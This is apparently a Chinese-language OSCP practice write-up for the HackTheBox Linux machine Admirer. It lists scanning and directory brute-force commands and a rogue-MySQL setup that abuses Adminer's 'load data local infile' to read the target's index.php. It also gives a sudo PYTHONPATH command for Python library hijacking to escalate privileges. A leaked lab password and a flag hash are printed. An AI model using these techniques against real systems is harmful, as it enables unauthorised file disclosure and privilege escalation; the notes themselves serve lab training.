OSCP备考_0x27_HackThBox靶机_Linux_ Admirer
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.128.76 (扫描TCP)

nmap -sU --top-ports 100 10.129.128.76 (扫描UDP)

gobuster dir -u http://10.129.128.76/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

http://10.129.128.76//robots.txt

直接爆破下面路径
gobuster dir -u http://10.129.128.76/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html -t 50

gobuster dir -u http://10.129.128.76/admin-dir/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -t 50

http://10.129.128.76/admin-dir//contacts.txt

http://10.129.128.76/admin-dir/credentials.txt

连接FTP

都下载下来开始搜索有啥可用信息


gobuster dir -u http://10.129.128.76/utility-scripts/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -t 50

http://10.129.128.76/utility-scripts//adminer.php

需要获取到数据库上的password,才能的到真实的waldo密码,


CREATE DATABASE admirer;
CREATE USER 'demo'@'%' IDENTIFIED BY 'demo_admirer';
GRANT ALL PRIVILEGES ON * . * TO 'demo'@'%';
FLUSH PRIVILEGES;
create table lez(data VARCHAR(255));
然后打开远程访问
vim /etc/mysql/mariadb.conf.d/50-server.cnf
systemctl restart mysql

改成0.0.0.0,然后在使用远程的机器进行访问

然就可以查看index.php
load data local infile '../index.php'
into table admirer.lez
fields terminated by '/n'


waldo, &<h5b~yK3F#{PaPB&dA}{H>




利用这py挡案

sudo PYTHONPATH=/tmp /opt/scripts/admin_tasks.sh 6
根据上面显示可以得出是加载模块shutil里面的函数make_archive 那么就可以利用此处新建一个shutil的python脚本文件然后加载函数make_archive再执行命令进行提权
相关python 库劫持可以参考:https://rastating.github.io/privilege-escalation-via-python-library-hijacking/


3f851577a28a525b42596474270c7698




